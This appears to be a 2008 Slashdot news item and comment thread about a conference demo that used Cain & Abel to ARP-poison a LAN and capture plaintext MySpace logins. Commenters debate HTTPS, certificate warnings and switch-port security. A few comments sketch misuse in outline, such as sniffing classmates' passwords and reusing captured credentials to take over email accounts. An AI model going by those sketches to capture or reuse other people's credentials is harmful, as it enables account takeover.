Man-in-the-Middle Attack on MySpace with Cain

Slimjim100 writes "Last year at ChicagoCon 2007, Brian Wilson gave a great talk entitled "Cain & Abel: Windows Can Hack, Too!" Although the presentation and audio recording of the talk can be downloaded from the ChicagoCon site at Library, I had totally forgotten to publish his videos. Just in case things didn't go as planned during the live event or his laptop crapped out on him, Brian made a video of the MITM attack he demonstrated using Cain. You get to see how Myspace and other social networking sites are not designed with security in mind."

Brian Wilson

Wow, musically talented and a computer hacker. I guess myspace isn't giving him good vibrations now though.

Re:

Brian Wilson the influential 1960 music icon, or Brian Wilson the Scottish MP? I'm glad the submitter clarified it for us.

Security?

Of course they're not designed with security in mind. They're designed with data mining and ad-hits in mind.

Duh....

HTTP and other plain text protocols vulnerable to MITM, film at 11.

And if they used https?

And if they used https instead, about .01% of their users would be computer savvy enough to check the certificate when the warning pops up. People just click through. Even technical users simply assume that that the certificate was allowed to lapse or something. https is not a panacea for man in the middle attacks.

Re:

Actually, no, as a technical user, it's incredibly easy to see the reason that the certificate isn't valid -- and if there were shenanigans going on, it wouldn't be because it was expired.

Also, https means it is actually possible to be secure -- you check

Re:

The point isn't that you'd get a pop-up when everything's going right - you'd get a pop-up when someone's attempting the man-in-the middle attack. And if the users aren't savvy, or assume as the OP said that the certificate has just expired, they're going

Re:

"When was the last time you got a pop-up visiting your bank, or PayPal etc?"

Last week: http://www.theregister.co.uk/2008/03/10/hsbc_cert_glitch/ [theregister.co.uk]
Fortunately, it was not a problem, as people would recognize the site as legitimate anyway. (Well, that's what t

Re:

Exactly. I've trained everyone I know to reject https connections that have cert warnings, based on the reasoning that there is no excuse whatsoever for a med-large site operator to have a lapsed cert.

And you know what, they HEED my advice. They now have a

This is not new

This is a local ARP poisoning attack.

  What did the notice to Myspace/google etc consist of? I can break things on my local LAN, so fix your site?

  If he did this in my office he'd get a tireiron to the head because I could walk over to him and do it.

Re:

What did the notice to Myspace/google etc consist of? I can break things on my local LAN, so fix your site?

Well, yes.

The point is that, as you observe, it's trivial on many switched LANs to ARP poison and steal session credentials. (It's all about the session, dummy, not the data.) Pinch a Gmail password from a co-worker and you probably own their domain pa

Re:

Or heighten up the layer 2 security. If I only allow one mac address per switchport, this wouldn't work. Why fix the remote side when the problem is local? Add some 802.1x authentication, and you're not even getting on my LAN unless you're authenticated

Re:

I can break things on my local LAN, so fix your site?

When "my local LAN" is some random wifi hotspot, it would be nice to have it not be broken there.

And "fix your site" is as simple as sticking https in front of it. Google has this as an option, anyway.

Do I understand this correctly?

He has two systems on his local network. He's using a "man in the middle" attack to use System A to sniff the traffic of System B. Then he's pointing out that you can get passwords from systems like MySpace because it's not encrypted.

How is this a big deal? This does not allow someone to get anyone's password that isn't on their same network. There are easier ways to get someone's password if you're on the same network as them, starting with slapping them until they give you their password. But it all comes back to - if the site matters, it's using HTTPs.

Re:

Yeah, it's less man-in-the-middle than man-on-the-same-subnet, so it's a particularly easy attack. The tool is quite slick about automating it though, so some definite kudos are deserved. Besides, slapping them repeatedly might reveal your intentions, whil

Cain and Abel aren't new.

Hell, I remember scriptkiddying passwords out of .pwl files in '00. These apps have been around for a long time.

Re:

Ah yes, back in the day that was all cain could do :-) I remember using ftp in windows to bypass the restrictions on the windows explorer, and cracking all my friend's passwords. Fun times had by all.

Cain has actually progressed by ridiculous leaps and b

Don't use MySpace!

MySpace is notoriously insecure and a hacker or spammer's playground. The first thing I noticed when I created an account 10 months ago is that there was no HTTPS logon. Even Facebook has that!

But even if they were to use HTTPS, that still wouldn't solve MySpace's issues. A lot of the people on my Friends List were not very tech savvy (like a lot of users), and, since most of them were teens, they easily fell for phishing scams and hacks. And then I get punished for their poor security practices by having my message board filled with ads for the "free, HoTtEsT ringtones!!!!" and "see girls naked!!!!" (btw all of those sites had viruses or malware on them). I stopped using MySpace after 2 months, I got tired of all the insecurity.

If I were to run this attack on the computers at my high school, I could cripple a lot of kid's social lives (and get expelled when the admins see :) I see SO many of my classmates using proxies to get on MySpace at school (even though it's against school rules, which I don't blame after seeing some of my classmate's MySpace pages). They just don't understand how easily I could get their password (or whoevers running the proxy, or even the admins). And it's worse when you wonder how many kids use the same user name and password for everything...

Kids these days are just not educated enough on good security practices, or show a lack of common sense with this stuff...

Re:

I set up my own http proxy on my own webserver (well okay it was remotely hosted webspace but w/e) and pw protected it. Too bad it didn't work 100% being HTTP based and not a real proxy but its all good. This was like 10th or 11th grade so I could get onto

Surprised??

Honestly? Social sites and security? Why should they be interested in it??

Re:

Because people do stupid things repeatedly.

Let's say I discovered you had logged on to Facebook with the username of "fluch" and a password of "blather". The next thing I'm going to try is to log on to gmail and try signing on as "fluch@gmail.com" with

It gets better

We had always worried about this on University housing networks. You're pretty much guaranteed that every user is a Myspace user. Better yet once you main in the middle the myspace login / pw chances are it just gave away their e-mail login too. Login: bob@gmail.com PW: bob420 probably goes to that gmail account too. From there you can reset any account you see in his Gmail account. Myspace really turns into a giant weakness of the Internet.

Re:

I'd say the users are the weakness! PEBKAC [wikipedia.org]!

banks.

The not so funny thing about man in the middle attacks is that most non https sites are vulnerable to them.

Take the Chase.com [chase.com] homepage. It's got a login form right there (it doesn't matter if it's secure or not). If you were a victim of a man in the mi

Re:

There was a vulnerability in Windows that allowed attackers to remotely install arbitrary CA certificates in the operating system's certificate store without users' knowledge.

That was an implementation problem with Windows, not with the design of https.